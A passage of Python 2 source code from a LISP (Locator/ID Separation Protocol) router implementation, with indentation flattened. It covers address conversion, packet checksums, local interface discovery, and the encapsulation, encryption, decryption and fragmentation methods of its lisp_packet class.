# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
